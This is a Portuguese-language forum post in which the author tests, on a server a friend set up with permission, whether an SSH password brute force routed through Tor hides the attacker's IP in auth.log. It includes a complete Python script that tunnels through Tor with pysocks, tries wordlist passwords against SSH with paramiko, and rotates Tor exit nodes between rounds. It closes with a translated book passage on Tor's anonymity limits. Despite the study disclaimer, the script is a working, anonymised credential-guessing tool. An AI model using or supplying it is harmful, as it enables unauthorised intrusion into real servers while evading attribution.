Guest gnoo Posted May 29, 2018 at 11:37 PM Share Posted May 29, 2018 at 11:37 PM Saudações, estava eu a ler um livro para criar um scraper... já agora o livro é este: quando quase no fim do livro falava sobre uma biblioteca do python - pysocks, para obter algum anonimato durante a execução de programas onde são feitas requisições para a rede, eu como ainda não tinha mexido com proxys, pelo menos da forma que vou exemplificar de seguida, larguei tudo e fui procurar informação sobre o assunto... não é dificil encontrar, com algumas bases programação consegue perceber bem como a biblioteca pysocks funciona, e o seu uso é relativamente fácil. Comecei a montar um código, mas tinha a sensação que aquilo não cumpria a sua função, ficava um pouco inquieto ao pensar que podia estar a realizar "alegadamente" testes em redes reais, e ser o meu IP que ficava lá e não do proxy. Entretanto pedi a um amigo meu que é sysadmin para montar um servidor numa outra cidade bem longe de mim para eu poder administrar e com permissão para realizar todos os testes que eu bem entender e para que o cenário fosse o mais real possível, porque ver na prática como as coisas funcionam é outra coisa. E assim foi, ele montou o servidor eu montei o código e iniciei os testes... O processo em si avaliado do ponto de vista técnico é extremamente básico, até porque o objectivo não era a invasão do servidor mas sim perceber qual o registo que fica do lado de lá quando é feito um brute force usando o serviço do TOR. A conversa do costume, não é: O CONTEÚDO QUE SEGUE É APENAS E SÓÓÓÓÓÓ PARA ESTUDO, ESTE TIPO DE PRÁTICAS FEITAS SEM AUTORIZAÇÃO É CRIME..... O código que segue não eficiente especialmente para grandes dicionários, como já disse o objectivo não é a invasão em si mas o comportamento do servidor, e perceber se realmente o teu ip não fica registado no auth.log do sistema. import socks import socket import paramiko host ='<IP>' porto = username = '<user>' lista_passwords = open("passwords.txt","r") passwords = lista_passwords.readlines() def conexao_tor(): socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, "localhost", 9050, True) socket.socket = socks.socksocket print("Conectado ao \033[5;92m\u25CF\033[00mTor SOCK5 \033[1;32m(serviço ativo)\033[00m") def conexao_ssh(): for password in passwords: try: ssh =paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print("A testar Password: %s" % password, end = '') ssh.connect(host,porto,username,password.strip()) sessao = ssh.get_transport().open_session() if sessao.active: print("\033[5;92m[+]Password encontrada:\033[00m %s" % password) except Exception as erro: pass print("Operação terminada!") def nova_identidade(): socks.setdefaultproxy() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 9051)) sock.send(b"AUTHENTICATE\r\n") resposta = sock.recv(1024) if b"250" in resposta: sock.send(b"SIGNAL NEWNYM\r\n") print("\033[1;33mNova identidade atribuida...%s\033[00m\n" %resposta.decode(),) sock.close() conexao_tor() def main(): conexao_tor() conexao_ssh() nova_identidade() conexao_ssh() if __name__ == '__main__': main() Depois de executar o código fui ao ficheiro auth.log e realmente o IP que lá estava não era o meu... E nessa altura senti-me grande ... Os resultados foram: Dois IP's diferentes que não são meus... e dois ips porquê?? Se leram o código e sabem o que está ali eu repeti a operação duas vezes, mas antes de iniciar o segundo round mudei de identidade... ah pois ééééé da para mudar identidade ...ou seja imagino que seja feito um redireccionamento para outro nó de saída do TOR. Mas tinha que confirmar se realmente seriam nós de saída do TOR e foi a esta página (acreditando que a informação é fiavel): https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=1.1.1.1 E confirma são dois nós de saída do TOR NOTA: Mas como isto não são tudo rosas o autor do livro deixa alguns avisos que devem ser levados em consideração.... Tradução do Google Tradutor ( Limitei-me a fazer Copy / Paste como devem calcular o português não é o mais correto): Citar Embora a razão de estarmos usando o Tor neste livro seja mudar nosso Endereço IP, não alcançar o anonimato completo per se, vale a pena um momento para abordar algumas das forças e limitações do A capacidade do Tor de anonimizar o tráfego. Embora você possa supor ao usar o Tor que o endereço IP que você estão vindo, de acordo com um servidor web, não é um endereço IP que pode ser rastreada até você, qualquer informação que você compartilhe com servidor web pode expor você. Por exemplo, se você entrar no seu conta própria do Gmail e, em seguida, fazer pesquisas incriminatórias no Google, essas pesquisas agora podem ser vinculadas à sua identidade. Além do óbvio, no entanto, até mesmo o ato de entrar no Tor pode ser perigoso para o seu anonimato. Em dezembro de 2013, uma estudante de graduação vard, na tentativa de sair da final exames, enviou uma ameaça de bomba para a escola através da rede Tor trabalho, usando uma conta de e-mail anônima. Quando o Harvard IT equipe olhou para seus logs, eles encontraram o tráfego indo para o Tor rede de uma única máquina, registrada em um local conhecido durante o tempo em que a ameaça de bomba foi enviada. Embora eles não conseguiu identificar o eventual destino deste tráfego (apenas foi enviado através do Tor), o fato de que os tempos combinaram e lá foi apenas uma única máquina logada no momento foi condenável o suficiente para processar o aluno. Entrar no Tor não é um manto automático de invisibilidade, nem dar-lhe livre reinado para fazer o que quiser na Internet. Apesar disso é uma ferramenta útil, certifique-se de usá-la com cautela, inteligência e Claro, moralidade. simplescreenrecorder-2018-05-29_23.13.02.mp4 Cumprimentos... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.